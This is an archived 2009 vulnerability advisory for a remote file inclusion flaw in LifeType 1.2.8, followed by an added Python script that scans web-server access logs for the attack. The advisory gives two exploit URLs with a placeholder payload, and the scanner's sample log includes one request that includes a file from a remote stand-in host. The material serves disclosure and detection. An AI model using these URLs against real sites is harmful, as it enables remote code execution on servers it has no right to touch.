Information Security

From: Cru3l.b0y <Cru3l.b0y_(at)_gmail.com>
Date: July 16, 2009
Subject: LifeType 1.2.8 Remote File Inclusion Vulnerability

/==============================================================================\
 |
 |  [o] LifeType 1.2.8 Remote File Inclusion Vulnerability
 |
 |       Software : LifeType 1.2.8
 |       Vendor   : http://lifetype.net/
 |       Author   : Cru3l.b0y
 |       Contact  : Cru3l.b0y@deltahacking.net
 |       Home     : WwW.DeltaHacking.Net
 |
 |==============================================================================|
 |
 |  [o] Vulnerable file
 |
 |       install/installation.class.php
 |
 |        include_once( PLOG_CLASS_PATH."config/config.properties.php" );
 |
 |       class/bootstrap.php
 |
 |        include( PLOG_CLASS_PATH."class/object/loader.class.php" );
 |
 |  [o] Exploit
 |
 |       http://localhost/[path]/install/installation.class.php?PLOG_CLASS_PATH=[evilcode]
 |       http://localhost/[path]/class/bootstrap.php?PLOG_CLASS_PATH=[evilcode]
 |
 |==============================================================================|
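
For defenders, one way to check web-server access logs for the two request patterns listed in the advisory. This is an added example, not part of the original post; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Scripts and parameter named in the advisory above.
SCRIPTS = ("install/installation.class.php", "class/bootstrap.php")
PARAM = "PLOG_CLASS_PATH"

# Assumption: Apache/nginx "combined" access-log format.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3})')
# Value that starts with a URL scheme or a data: URI, i.e. not a local path.
REMOTE = re.compile(r"\s*(?:[a-z][a-z0-9+.\-]*://|data:)", re.IGNORECASE)

def classify(line):
    """Return a finding dict if the request sets PLOG_CLASS_PATH on one of
    the two scripts, otherwise None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target, status = m.group(1), m.group(2), int(m.group(3))
    url = urlsplit(target)
    path = unquote(url.path).lower()
    script = next((s for s in SCRIPTS if path.endswith("/" + s)), None)
    if script is None:
        return None
    # parse_qsl percent-decodes names, so PLOG%5FCLASS%5FPATH is caught too.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # PHP also accepts array syntax (PLOG_CLASS_PATH[]=...): drop brackets.
        if name.split("[", 1)[0] == PARAM:
            return {"client": client, "script": script, "status": status,
                    "remote_value": bool(REMOTE.match(value))}
    return None

def scan(lines):
    """Classify every log line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [16/Jul/2009:10:00:01 +0000] "GET /blog/index.php?blogId=1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [16/Jul/2009:10:02:13 +0000] "GET /blog/class/bootstrap.php?PLOG_CLASS_PATH=http://host.example.invalid/a.txt HTTP/1.1" 200 17',
    '192.0.2.44 - - [16/Jul/2009:10:02:15 +0000] "GET /blog/install/installation.class.php?PLOG%5FCLASS%5FPATH=/var/www/blog/ HTTP/1.1" 404 209',
    '192.0.2.77 - - [16/Jul/2009:10:05:40 +0000] "GET /blog/class/bootstrap.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so a value sent in a POST body or a cookie would not show up in this scan.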

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod